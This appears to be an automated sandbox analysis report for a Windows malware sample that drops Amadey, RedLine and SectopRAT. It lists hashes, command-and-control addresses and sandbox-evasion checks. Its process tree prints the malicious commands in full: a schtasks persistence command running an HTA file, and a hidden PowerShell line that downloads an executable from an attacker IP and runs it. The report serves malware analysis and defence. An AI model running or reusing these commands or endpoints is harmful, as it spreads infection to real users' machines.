Analysis
-
max time kernel
150s -
max time network
149s -
platform
windows7_x64 -
resource
win7-20241010-en -
resource tags
arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system -
submitted
15-02-2025 17:02
Static task
static1
Behavioral task
behavioral1
Sample
5QZQM_random.exe
Resource
win7-20241010-en
General
-
Target
5QZQM_random.exe
-
Size
938KB
-
MD5
2a652936c15591f45c63a9c6c01ed212
-
SHA1
5dad7de67525e4b6f3ed8e5d6f4257943eac7c62
-
SHA256
1723bd9dd8938f0a1d3cd89fe50a54f8538d4961c2a15d385e94f0e0f36d9be7
-
SHA512
64981162e2202c9ed051f5e9a8a04f5760c382fd42a77be3625f6194419f0ee596fb86b68d8a7f8c57b9aa9a4c4dbc90aee1cc69884d45cd572958e2e0b9517f
-
SSDEEP
24576:+qDEvCTbMWu7rQYlBQcBiT6rprG8ay0F:+TvC/MTQYxsWR7ay0
Malware Config
Extracted
http://185.215.113.16/mine/random.exe
Extracted
amadey
4.42
9c9aa5
http://185.215.113.43
-
install_dir
abc3bc1985
-
install_file
skotes.exe
-
strings_key
8a35cf2ea38c2817dba29a4b5b25dcf0
-
url_paths
/Zu7JuNko/index.php
Extracted
redline
cheat
103.84.89.222:33791
Signatures
-
Amadey family
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
Redline family
-
SectopRAT payload 2 IoCs
resource yara_rule behavioral1/memory/1288-77-0x0000000001350000-0x00000000017C8000-memory.dmp family_sectoprat behavioral1/memory/1288-78-0x0000000001350000-0x00000000017C8000-memory.dmp family_sectoprat -
Sectoprat family
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ TempNP58OLGZLAWMPQPZF7DRJWUCDZM8RVXA.EXE Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ ViGgA8C.exe -
Blocklisted process makes network request 1 IoCs
flow pid Process 4 1256 powershell.exe -
pid Process 1836 powershell.exe 1256 powershell.exe -
Downloads MZ/PE file 2 IoCs
flow pid Process 4 1256 powershell.exe 8 2552 skotes.exe -
Checks BIOS information in registry 2 TTPs 6 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion ViGgA8C.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion ViGgA8C.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion TempNP58OLGZLAWMPQPZF7DRJWUCDZM8RVXA.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion TempNP58OLGZLAWMPQPZF7DRJWUCDZM8RVXA.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe -
Executes dropped EXE 3 IoCs
pid Process 1768 TempNP58OLGZLAWMPQPZF7DRJWUCDZM8RVXA.EXE 2552 skotes.exe 1288 ViGgA8C.exe -
Identifies Wine through registry keys 2 TTPs 3 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Wine TempNP58OLGZLAWMPQPZF7DRJWUCDZM8RVXA.EXE Key opened \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Wine ViGgA8C.exe -
Loads dropped DLL 5 IoCs
pid Process 1256 powershell.exe 1256 powershell.exe 1768 TempNP58OLGZLAWMPQPZF7DRJWUCDZM8RVXA.EXE 1768 TempNP58OLGZLAWMPQPZF7DRJWUCDZM8RVXA.EXE 2552 skotes.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 3 IoCs
pid Process 1768 TempNP58OLGZLAWMPQPZF7DRJWUCDZM8RVXA.EXE 2552 skotes.exe 1288 ViGgA8C.exe -
Drops file in Windows directory 1 IoCs
description ioc Process File created C:\Windows\Tasks\skotes.job TempNP58OLGZLAWMPQPZF7DRJWUCDZM8RVXA.EXE -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 9 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language skotes.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 5QZQM_random.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language TempNP58OLGZLAWMPQPZF7DRJWUCDZM8RVXA.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ViGgA8C.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1180 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 8 IoCs
pid Process 1256 powershell.exe 1256 powershell.exe 1256 powershell.exe 1768 TempNP58OLGZLAWMPQPZF7DRJWUCDZM8RVXA.EXE 2552 skotes.exe 1836 powershell.exe 1288 ViGgA8C.exe 1288 ViGgA8C.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 1256 powershell.exe Token: SeDebugPrivilege 1836 powershell.exe Token: SeDebugPrivilege 1288 ViGgA8C.exe -
Suspicious use of FindShellTrayWindow 4 IoCs
pid Process 1712 5QZQM_random.exe 1712 5QZQM_random.exe 1712 5QZQM_random.exe 1768 TempNP58OLGZLAWMPQPZF7DRJWUCDZM8RVXA.EXE -
Suspicious use of SendNotifyMessage 3 IoCs
pid Process 1712 5QZQM_random.exe 1712 5QZQM_random.exe 1712 5QZQM_random.exe -
Suspicious use of WriteProcessMemory 32 IoCs
description pid Process procid_target PID 1712 wrote to memory of 1968 1712 5QZQM_random.exe 30 PID 1712 wrote to memory of 1968 1712 5QZQM_random.exe 30 PID 1712 wrote to memory of 1968 1712 5QZQM_random.exe 30 PID 1712 wrote to memory of 1968 1712 5QZQM_random.exe 30 PID 1712 wrote to memory of 2072 1712 5QZQM_random.exe 31 PID 1712 wrote to memory of 2072 1712 5QZQM_random.exe 31 PID 1712 wrote to memory of 2072 1712 5QZQM_random.exe 31 PID 1712 wrote to memory of 2072 1712 5QZQM_random.exe 31 PID 1968 wrote to memory of 1180 1968 cmd.exe 33 PID 1968 wrote to memory of 1180 1968 cmd.exe 33 PID 1968 wrote to memory of 1180 1968 cmd.exe 33 PID 1968 wrote to memory of 1180 1968 cmd.exe 33 PID 2072 wrote to memory of 1256 2072 mshta.exe 34 PID 2072 wrote to memory of 1256 2072 mshta.exe 34 PID 2072 wrote to memory of 1256 2072 mshta.exe 34 PID 2072 wrote to memory of 1256 2072 mshta.exe 34 PID 1256 wrote to memory of 1768 1256 powershell.exe 36 PID 1256 wrote to memory of 1768 1256 powershell.exe 36 PID 1256 wrote to memory of 1768 1256 powershell.exe 36 PID 1256 wrote to memory of 1768 1256 powershell.exe 36 PID 1768 wrote to memory of 2552 1768 TempNP58OLGZLAWMPQPZF7DRJWUCDZM8RVXA.EXE 37 PID 1768 wrote to memory of 2552 1768 TempNP58OLGZLAWMPQPZF7DRJWUCDZM8RVXA.EXE 37 PID 1768 wrote to memory of 2552 1768 TempNP58OLGZLAWMPQPZF7DRJWUCDZM8RVXA.EXE 37 PID 1768 wrote to memory of 2552 1768 TempNP58OLGZLAWMPQPZF7DRJWUCDZM8RVXA.EXE 37 PID 2552 wrote to memory of 1836 2552 skotes.exe 40 PID 2552 wrote to memory of 1836 2552 skotes.exe 40 PID 2552 wrote to memory of 1836 2552 skotes.exe 40 PID 2552 wrote to memory of 1836 2552 skotes.exe 40 PID 2552 wrote to memory of 1288 2552 skotes.exe 42 PID 2552 wrote to memory of 1288 2552 skotes.exe 42 PID 2552 wrote to memory of 1288 2552 skotes.exe 42 PID 2552 wrote to memory of 1288 2552 skotes.exe 42
Processes
-
C:\Users\Admin\AppData\Local\Temp\5QZQM_random.exe"C:\Users\Admin\AppData\Local\Temp\5QZQM_random.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1712 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /tn NpghkmaxE8b /tr "mshta C:\Users\Admin\AppData\Local\Temp\oIbPWwHMT.hta" /sc minute /mo 25 /ru "Admin" /f2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1968 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn NpghkmaxE8b /tr "mshta C:\Users\Admin\AppData\Local\Temp\oIbPWwHMT.hta" /sc minute /mo 25 /ru "Admin" /f3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:1180
-
-
-
C:\Windows\SysWOW64\mshta.exemshta C:\Users\Admin\AppData\Local\Temp\oIbPWwHMT.hta2⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:2072 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'NP58OLGZLAWMPQPZF7DRJWUCDZM8RVXA.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1256 -
C:\Users\Admin\AppData\Local\TempNP58OLGZLAWMPQPZF7DRJWUCDZM8RVXA.EXE"C:\Users\Admin\AppData\Local\TempNP58OLGZLAWMPQPZF7DRJWUCDZM8RVXA.EXE"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:1768 -
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Downloads MZ/PE file
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2552 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy remotesigned -File "C:\Users\Admin\AppData\Local\Temp\1073578041\tYliuwV.ps1"6⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1836
-
-
C:\Users\Admin\AppData\Local\Temp\1073896001\ViGgA8C.exe"C:\Users\Admin\AppData\Local\Temp\1073896001\ViGgA8C.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1288
-
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
768KB
MD5c7b5c7ade500f25ce46fecf31dd278d3
SHA1c22cd6ba0bc78cb3d54c8f5a08cebf36beb4cd8c
SHA256dbb48c518e9c81967e7867a780e3b0a6dfa1033a631ce8421dfca0b52b52e095
SHA51259dec1f7445c02c7177269f8d099f5f1b4928422f929a57bec06b1ce51fc7ff36b475cbbacfa1b7d847ea1fb23812602e50675e9c50ae039b235f96e150e6828
-
Filesize
1.7MB
MD5f662cb18e04cc62863751b672570bd7d
SHA11630d460c4ca5061d1d10ecdfd9a3c7d85b30896
SHA2561e9ff1fc659f304a408cff60895ef815d0a9d669a3d462e0046f55c8c6feafc2
SHA512ce51435c8fb272e40c323f03e8bb6dfa92d89c97bf1e26dc960b7cab6642c2e4bc4804660d0adac61e3b77c46bca056f6d53bedabcbeb3be5b6151bf61cee8f4
-
Filesize
720B
MD5c6910aed9f6537768f85e6410cbbd8ee
SHA19ac3ba2b01f0e19f9718f74108a5fb0f52691e3b
SHA2561e2daf6bca2110c968aae773c7b92a10d7122fd2fa07edb5054d35226e873571
SHA512af3a7732969935749fee625794944be4164436c4802dd82f05e664c0f8bf588245c5cceb38a5c3e176508bbc3772a13f5e2d46db9b583fb4c3e2f8f0d8c6d9ec
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\52VTCIAENQU2XW1S36AF.temp
Filesize7KB
MD52f09b9176f9eb831c6f02b0aabb86f06
SHA1acfa4630873566453d0bb9e7676c4ac1518d1503
SHA2560043bded281bbe23e578340e9c8b44549bbc62d01d165c27efca057fe2990721
SHA5120cd983a6d18bcf86bf4fb60c0e38c8bef979e4d4ee2c60cbb024f714d362b32deb14ff79e431baa561751958fcf563b9826144bd20bcbf70920be275704eff59
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize7KB
MD52ac825279630cfaf2b7d3f5ccd7903e7
SHA1d803975a7b0721ae5f64740081d5de3f80cd1fbe
SHA25636db64ff9322bb2db2718e8736c7d6131dab26e9550af58dfaec89bead152f28
SHA5124ceb98b4967dedc7d6131a2b0680fed4b316abca3466d2c4240c1560d69d6842b7fb3ae7b79ce8e3059a7a334bc31b97d30eab549234d4b0332f610e72e4efef
-
Filesize
2.1MB
MD5569e59d6838517ef40ad5d42d5ffe3ab
SHA106e6b6e5fa09611b56aa56bc81173cfcbd138640
SHA256772137b7c1ca4002181b9252143c9793c9f45c0935564a75d44fbc6d2aa33d30
SHA5121ac54228ffa2a71de44dba4e68b24426db3c17a09140fd441be8be92c7f5758fc46bb7f0e9501019efce68e3a745eece7da4284c89d5dd039f4b3c0e5434b768